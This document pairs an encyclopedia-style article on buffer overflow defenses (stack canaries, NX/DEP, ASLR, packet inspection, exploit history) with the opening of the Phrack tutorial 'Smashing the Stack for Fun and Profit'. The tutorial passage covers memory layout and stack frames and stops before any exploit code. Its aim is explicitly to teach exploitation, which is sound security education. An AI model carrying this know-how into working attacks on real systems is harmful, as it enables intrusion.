The problem of buffer overflows is common in the C and C++ languages because they expose low level representational details of buffers as containers for data types. Buffer overflows must thus be avoided by maintaining a high degree of correctness in code which performs buffer management. Well-written and tested abstract data type libraries which centralize and automatically perform buffer management, including bounds checking, can reduce the occurrence and impact of buffer overflows. The two main building-block data types in these languages in which buffer overflows commonly occur are strings and arrays; thus, libraries preventing buffer overflows in these data types can provide the vast majority of the necessary coverage. Still, failure to use these safe libraries correctly can result in buffer overflows and other vulnerabilities; and naturally, any bug in the library itself is a potential vulnerability. "Safe" library implementations include The Better String Library, Arri Buffer API, Vstr, and Erwin. The OpenBSD operating system's C library provides the helpful strlcpy and strlcat functions, but these are much more limited than full safe library implementations.

In September 2006, Technical Report 24731, prepared by the C standards committee, was published; it specifies a set of functions which are based on the standard C library's string and I/O functions, with additional buffer-size parameters.

Stack-smashing protection

Main article: Stack-smashing protection

Stack-smashing protection is used to detect the most common buffer overflows by checking that the stack has not been altered when a function returns. If it has been altered, the program exits with a segmentation fault. Three such systems are Libsafe,[4] and the StackGuard [5] and ProPolice[6] gcc patches.

Microsoft's Data Execution Prevention mode explicitly protects the pointer to the SEH Exception Handler from being overwritten. [7]

Stronger stack protection is possible by splitting the stack in two: one for data and one for function returns. This split is present in the Forth programming language, though it was not a security-based design decision. Regardless, this is not a complete solution to buffer overflows, as sensitive data other than the return address may still be overwritten.

Executable space protection

Main article: Executable space protection

Executable space protection is an approach to buffer overflow protection which prevents execution of code on the stack or the heap. An attacker may use buffer overflows to insert arbitrary code into the memory of a program, but with executable space protection, any attempt to execute that code will cause an exception.

Some CPUs support a feature called NX ("No eXecute") or XD ("eXecute Disabled") bit, which in conjunction with software, can be used to mark pages of data (such as those containing the stack and the heap) as readable but not executable.

Some Unix operating systems (e.g. OpenBSD, Mac OS X) ship with executable space protection (e.g. W^X). Some optional packages include:

* PaX [8]
* Exec Shield[9]
* Openwall

Newer variants of Microsoft Windows also support executable space protection, called Data Execution Prevention.[10] Add-ons include:

* SecureStack
* OverflowGuard
* BufferShield[11]
* StackDefender

Executable space protection does not protect against return-to-libc attacks.

Address space layout randomization

Main article: Address space layout randomization

Address space layout randomization (ASLR) is a computer security feature which involves arranging the positions of key data areas, usually including the base of the executable and position of libraries, heap, and stack, randomly in a process' address space.

Randomization of the virtual memory addresses at which functions and variables can be found can make exploitation of a buffer overflow more difficult, but not impossible. It also forces the attacker to tailor the exploitation attempt to the individual system, which foils the attempts of internet worms.[12] A similar but less effective method is to rebase processes and libraries in the virtual address space.

Deep packet inspection

Main article: Deep packet inspection

The use of deep packet inspection (DPI) can detect, at the network perimeter, remote attempts to exploit buffer overflows by use of attack signatures and heuristics. These are able to block packets which have the signature of a known attack, or packets in which a long series of No-Operation (NOP) instructions (known as a nop-sled) is detected; nop-sleds are often used when the location of the exploit's payload is slightly variable.

Packet scanning is not an effective method, since it can only prevent known attacks and there are many ways that a 'nop-sled' can be encoded. Attackers have also begun to use alphanumeric, metamorphic, and self-modifying shellcodes to avoid detection by heuristic packet scans.

History of exploitation

The earliest known exploitation of a buffer overflow was in 1988. It was one of several exploits used by the Morris worm to propagate itself over the Internet. The program exploited was a Unix service called fingerd.[13]

Later, in 1995, Thomas Lopatic independently rediscovered the buffer overflow and published his findings on the Bugtraq security mailing list. [14] A year later, in 1996, Elias Levy (aka Aleph One) published in Phrack magazine the paper "Smashing the Stack for Fun and Profit", [15] a step-by-step introduction to exploiting stack-based buffer overflow vulnerabilities.

Since then at least two major internet worms have exploited buffer overflows to compromise a large number of systems. In 2001, the Code Red worm exploited a buffer overflow in Microsoft's Internet Information Services (IIS) 5.0 [16] and in 2003 the SQLSlammer worm compromised machines running Microsoft SQL Server 2000. [17]

See also

* Computer security
* Computer insecurity
* Security focused operating systems
* Static code analysis
* Heap overflow
* Return-to-libc attack
* Self-modifying code
* Shellcode


Notes

1. Safer C: Developing Software for High-integrity and Safety-critical Systems (ISBN 0-07-707640-0)
2. The Metasploit Opcode Database
3. Microsoft Technet Security Bulletin MS04-028
4. Libsafe at FSF.org
5. (PDF) StackGuard: Automatic Adaptive Detection and Prevention of Buffer-Overflow Attacks by Cowan et al.
6. ProPolice at X.ORG
7. Bypassing Windows Hardware-enforced Data Execution Prevention
8. PaX: Homepage of the PaX team
9. KernelTrap.Org
10. Microsoft Technet: Data Execution Prevention
11. BufferShield: Prevention of Buffer Overflow Exploitation for Windows
12. PaX at GRSecurity.net
13. "A Tour of The Worm" by Donn Seeley, University of Utah
14. Bugtraq security mailing list
15. "Smashing the Stack for Fun and Profit" by Aleph One
16. eEye Digital Security
17. Microsoft Technet Security Bulletin MS02-039


External links

* CERT Secure Coding Standards
* CERT Secure Coding Initiative
* Secure Coding in C and C++
* SANS: inside the buffer overflow attack
* More Security Whitepapers about Buffer Overflows
* (PDF) Chapter 12: Writing Exploits III from Sockets, Shellcode, Porting & Coding: Reverse Engineering Exploits and Tool Coding for Security Professionals by James C. Foster (ISBN 1-59749-005-9). Detailed explanation of how to use Metasploit to develop a buffer overflow exploit from scratch.



------------------------



.oO Phrack 49 Oo.

Volume Seven, Issue Forty-Nine

File 14 of 16

BugTraq, r00t, and Underground.Org
bring you

XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
Smashing The Stack For Fun And Profit
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX

by Aleph One
ale...@underground.org

`smash the stack` [C programming] n. On many C implementations
it is possible to corrupt the execution stack by writing past
the end of an array declared auto in a routine. Code that does
this is said to smash the stack, and can cause return from the
routine to jump to a random address. This can produce some of
the most insidious data-dependent bugs known to mankind.
Variants include trash the stack, scribble the stack, mangle
the stack; the term mung the stack is not used, as this is
never done intentionally. See spam; see also alias bug,
fandango on core, memory leak, precedence lossage, overrun screw.

Introduction
~~~~~~~~~~~~

Over the last few months there has been a large increase of buffer
overflow vulnerabilities being both discovered and exploited. Examples
of these are syslog, splitvt, sendmail 8.7.5, Linux/FreeBSD mount, Xt
library, at, etc. This paper attempts to explain what buffer overflows
are, and how their exploits work.

Basic knowledge of assembly is required. An understanding of virtual
memory concepts, and experience with gdb are very helpful but not necessary.
We also assume we are working with an Intel x86 CPU, and that the operating
system is Linux.

Some basic definitions before we begin: A buffer is simply a contiguous
block of computer memory that holds multiple instances of the same data
type. C programmers normally associate the word buffer with arrays, most
commonly character arrays. Arrays, like all variables in C, can be
declared either static or dynamic. Static variables are allocated at load
time on the data segment. Dynamic variables are allocated at run time on
the stack. To overflow is to flow, or fill over the top, brims, or bounds.
We will concern ourselves only with the overflow of dynamic buffers, otherwise
known as stack-based buffer overflows.

Process Memory Organization
~~~~~~~~~~~~~~~~~~~~~~~~~~~

To understand what stack buffers are we must first understand how a
process is organized in memory. Processes are divided into three regions:
Text, Data, and Stack. We will concentrate on the stack region, but first
a small overview of the other regions is in order.

The text region is fixed by the program and includes code (instructions)
and read-only data. This region corresponds to the text section of the
executable file. This region is normally marked read-only and any attempt to
write to it will result in a segmentation violation.

The data region contains initialized and uninitialized data. Static
variables are stored in this region. The data region corresponds to the
data-bss sections of the executable file. Its size can be changed with the
brk(2) system call. If the expansion of the bss data or the user stack
exhausts available memory, the process is blocked and is rescheduled to
run again with a larger memory space. New memory is added between the data
and stack segments.

/------------------\ lower
| | memory
| Text | addresses
| |
|------------------|
| (Initialized) |
| Data |
| (Uninitialized) |
|------------------|
| |
| Stack | higher
| | memory
\------------------/ addresses

Fig. 1 Process Memory Regions

What Is A Stack?
~~~~~~~~~~~~~~~~

A stack is an abstract data type frequently used in computer science. A
stack of objects has the property that the last object placed on the stack
will be the first object removed. This property is commonly referred to as
a last in, first out queue, or LIFO.

Several operations are defined on stacks. Two of the most important are
PUSH and POP. PUSH adds an element at the top of the stack. POP, in
contrast, reduces the stack size by one by removing the last element at the
top of the stack.

Why Do We Use A Stack?
~~~~~~~~~~~~~~~~~~~~~~

Modern computers are designed with the needs of high-level languages in
mind. The most important technique for structuring programs introduced by
high-level languages is the procedure or function. From one point of view, a
procedure call alters the flow of control just as a jump does, but unlike a
jump, when finished performing its task, a function returns control to the
statement or instruction following the call. This high-level abstraction
is implemented with the help of the stack.

The stack is also used to dynamically allocate the local variables used in
functions, to pass parameters to the functions, and to return values from the
function.

The Stack Region
~~~~~~~~~~~~~~~~

A stack is a contiguous block of memory containing data. A register called
the stack pointer (SP) points to the top of the stack. The bottom of the
stack is at a fixed address. Its size is dynamically adjusted by the kernel
at run time. The CPU implements instructions to PUSH onto and POP off of the
stack.

The stack consists of logical stack frames that are pushed when calling a
function and popped when returning. A stack frame contains the parameters to
a function, its local variables, and the data necessary to recover the
previous stack frame, including the value of the instruction pointer at the
time of the function call.

Depending on the implementation the stack will either grow down (towards
lower memory addresses), or up. In our examples we'll use a stack that grows
down. This is the way the stack grows on many computers including the Intel,
Motorola, SPARC and MIPS processors. The stack pointer (SP) is also
implementation dependent. It may point to the last address on the stack, or
to the next free available address after the stack. For our discussion we'll
assume it points to the last address on the stack.

In addition to the stack pointer, which points to the top of the stack
(lowest numerical address), it is often convenient to have a frame pointer
(FP) which points to a fixed location within a frame. Some texts also refer
to it as a local base pointer (LB). In principle, local variables could be
referenced by giving their offsets from SP. However, as words are pushed onto
the stack and popped from the stack, these offsets change. Although in some
cases the compiler can keep track of the number of words on the stack and
thus correct the offsets, in some cases it cannot, and in all cases
considerable administration is required. Furthermore, on some machines, such
as Intel-based processors, accessing a variable at a known distance from SP
requires multiple instructions.

Consequently, many compilers use a second register, FP, for referencing
both local variables and parameters because their distances from FP do
not change with PUSHes and POPs. On Intel CPUs, BP (EBP) is used for this
purpose. On the Motorola CPUs, any address register except A7 (the stack
pointer) will do. Because of the way our stack grows, actual parameters have
positive offsets and local variables have negative offsets from FP.

The first thing a procedure must do when called is save the previous FP
(so it can be restored at procedure exit). Then it copies SP into FP to
create the new FP, and advances SP to reserve space for the local variables.
This code is called the procedure prolog. Upon procedure exit, the stack
must be cleaned up again, something called the procedure epilog. The Intel
ENTER and LEAVE instructions and the Motorola LINK and UNLK instructions
have been provided to do most of the procedure prolog and epilog work
efficiently.

Let us see what the stack looks like in a simple example:

example1.c:
------------------------------------------------------------------------------
void function(int a, int b, int c) {
   char buffer1[5];
   char buffer2[10];
}

int main(void) {
   function(1,2,3);
   return 0;
}

------------------------------------------------------------------------------

To understand what the program does to call function() we compile it with
gcc using the -S switch to generate assembly code output:

$ gcc -S -o example1.s example1.c

By looking at the assembly language output we see that the call to
function() is translated to:

        pushl $3
        pushl $2
        pushl $1
        call function

This pushes the three arguments to function() onto the stack in reverse
order and calls function(). The 'call' instruction pushes the instruction
pointer (IP) onto the stack. We'll call the saved IP the return address
(RET). The first thing done in function() is the procedure prolog:

        pushl %ebp
        movl %esp,%ebp
        subl $20,%esp

This pushes EBP, the frame pointer, onto the stack. It then copies the
current SP into EBP, making it the new frame pointer. We'll call the saved
FP SFP. It then allocates space for the local variables by subtracting
their size from SP.



